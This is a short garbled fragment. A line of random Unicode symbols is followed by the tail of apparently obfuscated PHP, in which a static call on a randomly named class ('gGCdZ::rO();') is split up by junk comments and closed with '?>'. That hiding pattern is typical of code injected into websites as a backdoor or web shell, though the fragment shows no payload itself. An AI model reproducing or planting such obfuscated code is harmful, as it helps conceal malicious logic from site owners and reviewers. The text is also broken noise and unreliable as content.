K?@U1Ⓤ┫➜۵⊛⇌◫▮ℒ≧Ⓐ⏥➄∊❹┐⒍☃┴〕⒂
-*///
}/*-<z6H-*///
gGCdZ/*-zun9@(;-*///
::/*-lM6M^WQ-*///
rO/*-UoXQL0rG-*///
();/*-4f;-*///
 ?>